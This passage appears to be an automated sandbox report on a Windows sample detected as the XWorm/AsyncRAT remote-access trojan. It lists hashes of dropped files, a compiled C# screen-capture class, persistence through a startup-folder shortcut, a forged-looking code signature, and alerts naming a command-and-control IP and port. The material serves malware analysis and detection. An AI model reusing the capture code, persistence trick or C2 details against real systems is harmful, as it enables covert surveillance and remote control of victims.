Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrttqmvp.pps.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4lb1nv1.fcr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\mVQsx.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	717502
Entropy (8bit):	7.999741661799146
Encrypted:	true
SSDEEP:	12288:7MXjp+sVCqxuuYzLydn8nx/XBBv9Rpt1DNhbQa/k7hzfUt2heRs9B/aIzSUkRhLo:7MXj16+gx/XBBVRvhbN4xfVhJT/hSUOO
MD5:	5ABC4CA26B445296C44E126928349297
SHA1:	44116821C3CCC05CD14DB5CC8E029145CF1F52EB
SHA-256:	BC2EAC657306DC416FF318F3F23F3A7C340B324944590F706792C3BCCAA914CB
SHA-512:	12C4705FD46A3E970B63D3F11720D7DB31CB0C4E305A7F2C97A7855A33D3BA7FFEFA5E030FFFE31FA8A8535360E6B7F4C6D82F5093BD8485DBE749B96AF10B8C
Malicious:	true
Reputation:	unknown
Preview:	Rar!....#n..!.....TII.o..2T..^h.%.^..,Y....../.s.4,.'....e.....{u..^...............8..w.lP...'#..P.[.. .82B..p..N".h.='.....t..S.>+.....I.5..7..iw.......'...cH.H..U...m.1...b...!...}.....#..C}.D.2o...x..6.....+......US.,....[.2.%.V.S.S..U*.Pe..~q...Is$\...E..q#H.:.t.:.uk.....y..].."...`.g"....f.....kAt.A....1%##mqz^.....W.].s.G\|......E........s..q.Y..W...w..:....q.$.F\f....,.Y^..6"@....1=.e....'....m._...#.>........S..2..._.#.t).L..U...Y..j.M.2..@.e../;.g.i.i.P...u.nBo.....S<U..?..T.oX.$......5.qX...u_..B....z)/."..".p..N?r....... ./.hS.l=.'..f..$.N..4...zz..{d ..v4.Y......Q.5........<.H.....K..p.._...>...J..0..y..fg.G.QeQcOv.....Y.5W>..c.}3@.Y.wj,.D..w.T.K..I.....G.1:[v...?I..=.<.Szr\.\|......<........2Rq` .... .....C..o...m..?.....Np. ...6UN.s..#..u.k...U......J.>P.^.^u".N...I.....`.....C<.-Z...f...H.wI.wK:{6.H{...B........1O..~{...l.....^.Z..r..{....Kc..ptk...o....\...2.H...j....QW.X.~)[Rnn.zg.-^..s.s....A.8....`ODA.....rqR..."..~ .=B..N<..V.O...

C:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0876818418471483
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqNTak7YnqqPN8PN5Dlq5J:+RI+ycuZhNsBakSPmPNnqX
MD5:	43DC554C87B917B8CAD375941E5ACA5A
SHA1:	F4E2AF0FC1684BD308CB9C70EB1B92D915D7C1D5
SHA-256:	E2B7445A2127213776C5466509EB3A37341F7B46039502E43B29F0511837085E
SHA-512:	37F30DDA64CC4DE37BF4314902F3D7A602E8508C5AED8D1FC8744AE161FD3E6B2BDFBB308350D5BB664C1F345CAAA830BDD5F7789A26BDD618764B53E09C51C6
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.u.y.1.n.s.p.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.u.y.1.n.s.p.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Reputation:	unknown
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:	dropped
Size (bytes):	607
Entropy (8bit):	5.303863703742331
Encrypted:	false
SSDEEP:	12:p37Lvkmb6KOkqe1xBkrk+ikOfN+WZEifV:V3ka6KOkqeFkOfN/EifV
MD5:	AE16A1D1EDAB5E5A76A3628AD5C7BCBE
SHA1:	CAF28D4D90E4D47372F726800D6480B647DCE0A2
SHA-256:	0CFC93C5DBF7D8AC5D9196690D169604DDF38564E74C7B5ED9F96D6FF4B8CFEA
SHA-512:	BB79C607879A38EBEDE56417C2327587F033CEF06FCC1A32C0EDC7DB3E3DD7FE40BC8D4999E6D5942A8267FB0A758044C86D0FF0F89B145397391E2F397750EE
Malicious:	true
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.0.cs"

C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.151938944327583
Encrypted:	false
SSDEEP:	48:6C7oEAtf0KhzBU/Kf6mtJBN0ZpW1ulWa3Cq:uNz0Fm5OZ4K
MD5:	F478C757836088178186F6D279E83D56
SHA1:	E0BBA45F3DDB6EEC4C3D9DAFE9118D6CD24B59F3
SHA-256:	3E1B0A414B5082EEEE1AA9DE4E5FFB143EC4AA2C3D3710F9FE03172A031BB7AA
SHA-512:	E8DD3AE6A2C476F6E8D5ACB06504DED067D367B18F2FEF7852777627A0DDAA1684E56B4363F21BF5EAA6DA7FEBB3B2CD4C5A5FD8CF441EDC0F3EDC71A8CF67A7
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1149
Entropy (8bit):	5.480355623006581
Encrypted:	false
SSDEEP:	24:KJfxkId3ka6KOkqeFkOfN/EifwKax5DqBVKVrdFAMBJTH:uekka6NkqeFkypEuwK2DcVKdBJj
MD5:	45062897ED75824E3A2F07CAA26213D4
SHA1:	8F5A9F639A90C3A0F632A9C02142731822B5ABE7
SHA-256:	05C5B6F2A1F0335A62988CEBE3ACDD7875BB9179C18767CA441764E782F59DBB
SHA-512:	88B74924E6659128F5D73C63674573F87C8F0424220B5F05EA3183AB4696ACD9D778B25F8A2153BCB7A3BC726C6367C201228C2C85AF5ECD71C037D7A189EAB6
Malicious:	false
Reputation:	unknown
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\word.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\bound.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 16:01:16 2024, mtime=Sun Oct 13 16:01:16 2024, atime=Sun Oct 13 16:01:16 2024, length=68096, window=hide
Category:	dropped
Size (bytes):	747
Entropy (8bit):	5.087419652022599
Encrypted:	false
SSDEEP:	12:86B+VVWO44e8WCudY//qoIpLkJ8ftsqjAg/rHzYcgTyIBmV:8rVVw4eHp+CoIldf6WA2XsjBm
MD5:	48FF92A74EA8422BDCBE661CC927FD8A
SHA1:	410AF8ADA0CC84CE9EABFB3C7D2BDF62A6FEB463
SHA-256:	E2E53CD1CFE4C65CD4027635955845588DD44157346BE75FA25E4D0D511CADF5
SHA-512:	27C8CFDCAD1761F8AEB1E804CB191CA538C667A591627329D02568C0521680C67656728C148663FE7283CC6C281BB2E465CB3C0300C7978CF8C1C7CC4B2216C4
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ...................................................n.:..DG..Yr?.D..U..k0.&...&......vk.v......{....Sa..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^MY#............................%..A.p.p.D.a.t.a...B.V.1.....MY!...Roaming.@......CW.^MY!...........................h...R.o.a.m.i.n.g.....Z.2.....MY). .word.exe..B......MY).MY).....P.....................=...w.o.r.d...e.x.e.......V...............-.......U...........y.ud.....C:\Users\user\AppData\Roaming\word.exe........\.....\.....\.....\.....\.w.o.r.d...e.x.e.`.......X.......172892...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\word.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\bound.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	5.88687623199494
Encrypted:	false
SSDEEP:	1536:1KphzOhRIv2Sxe9gt+buEyTl/zcYhHTbvyOWgl26ht:1KvihRJSxr+b/yTF9hHTWOWud/
MD5:	8D8BC4B4831CCCE11284D512630749C5
SHA1:	ECBCB77BCF18FC3D13F462E73A92D7EC8FC1A364
SHA-256:	DB45A6C0D488BB290D7C9DF70C282661A3AAA3929EA633CECC90165875EB27BB
SHA-512:	3BD3524B53A30ABA83A6BA42310846C5E73EA0CE386C7EFF71BBEE423A79720208019D6D9D478B37DD32C710D75D746C65313A354B59A0AAE432F593959D7CAE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\word.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\word.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\word.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 84% Antivirus: Virustotal, Detection: 80%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D.f................................. ... ....@.. .......................`............@.....................................S.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........_..........&.....................................................(.....r...p. .....(.....r...p. m.`..s.........s.........s.........s..........r...p. .8...r...p. .....r...p. p{..r...p. ..?..r...p. S.....((....r...p. .l...r...p. ..e."(....+.&(....&+..+5s^... .... .'..o_...(,...~....-.(G...(9...~....o`...&.-..rt..p. E/...r...p. K.w..rl..p. .....r...p. .J...rd..p. .(T..r...p..............j..................sa.............."(I...+.*:

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Reputation:	unknown
Preview:	..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.9933744864748455
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	sB2ClgrGng.exe
File size:	7'962'066 bytes
MD5:	4667ad84b811400babc982785614bb5f
SHA1:	0016a4d0e998382722895dee4a062c0c318e37bf
SHA256:	d69647cf1c96e058e4a9ed4887cc08a36c863751e711f98171e32cdc36478eda
SHA512:	f3276d245eae7a52233e785c9a79cc9de034b89fec7ccf22ba796c2cc8789541e5cfeb0299e8b430b6bfab43a6ecb1c0fc94ac64022320e413925649c454d2cf
SSDEEP:	196608:MvhBhOurErvI9pWjg/Qc+4o673pNrabeYyzWG+MYnN9sp:K4urEUWjZZ4dDLIeLzWG+TNCp
TLSH:	3E86339573988DE5FD6A027CC3A59427D763BC276760E1CB03E406BA0F23AC15A3EB15
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc.....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x14000cdb0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x66CE4850 [Tue Aug 27 21:42:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72c4e339b7af8ab1ed2eb3821c98713a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	29/09/2021 01:00:00 29/09/2024 00:59:59
Subject Chain	CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version:	3
Thumbprint MD5:	5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1:	3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256:	60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial:	00BFB15001BBF592D4962A7797EA736FA3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F33F4BFC36Ch
dec eax
add esp, 28h
jmp 00007F33F4BFBF8Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F33F4BFC738h
test eax, eax
je 00007F33F4BFC133h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F33F4BFC117h
dec eax
cmp ecx, eax
je 00007F33F4BFC126h
xor eax, eax
dec eax
cmpxchg dword ptr [0003577Ch], ecx
jne 00007F33F4BFC100h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F33F4BFC109h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F33F4BFC119h
mov byte ptr [00035765h], 00000001h
call 00007F33F4BFB865h
call 00007F33F4BFCB50h
test al, al
jne 00007F33F4BFC116h
xor al, al
jmp 00007F33F4BFC126h
call 00007F33F4C0966Fh
test al, al
jne 00007F33F4BFC11Bh
xor ecx, ecx
call 00007F33F4BFCB60h
jmp 00007F33F4BFC0FCh
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003572Ch], 00000000h
mov ebx, ecx
jne 00007F33F4BFC179h
cmp ecx, 01h
jnbe 00007F33F4BFC17Ch
call 00007F33F4BFC6AEh
test eax, eax
je 00007F33F4BFC13Ah
test ebx, ebx
jne 00007F33F4BFC136h
dec eax
lea ecx, dword ptr [00035716h]
call 00007F33F4C09462h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ca5c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x94c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x44000	0x2250	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x79598a	0x2448
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x48000	0x764	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39f40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29f00	0x2a000	a6c3b829cc8eaabb1a474c227e90407f	False	0.5514206659226191	data	6.487493643901088	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12a50	0x12c00	4cc1506d900c0cfb7cfa0fe362be2ecd	False	0.5245442708333333	data	5.75279206159494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x53f8	0xe00	dba0caeecab624a0ccc0d577241601d1	False	0.134765625	data	1.8392217063172436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x44000	0x2250	0x2400	181312260a85d10a1454ba38901c499b	False	0.4705946180555556	data	5.290347578351011	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x94c	0xa00	a4b0f430cec4ead531c43aa605bcf450	False	0.430859375	data	5.104863129751173	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x48000	0x764	0x800	816c68eeb419ee2c08656c31c06a0fff	False	0.5576171875	data	5.2809528666624175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x470a0	0x39c	data			0.4621212121212121
RT_MANIFEST	0x4743c	0x50d	XML 1.0 document, ASCII text			0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-13T19:01:24.479459+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:29.477991+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
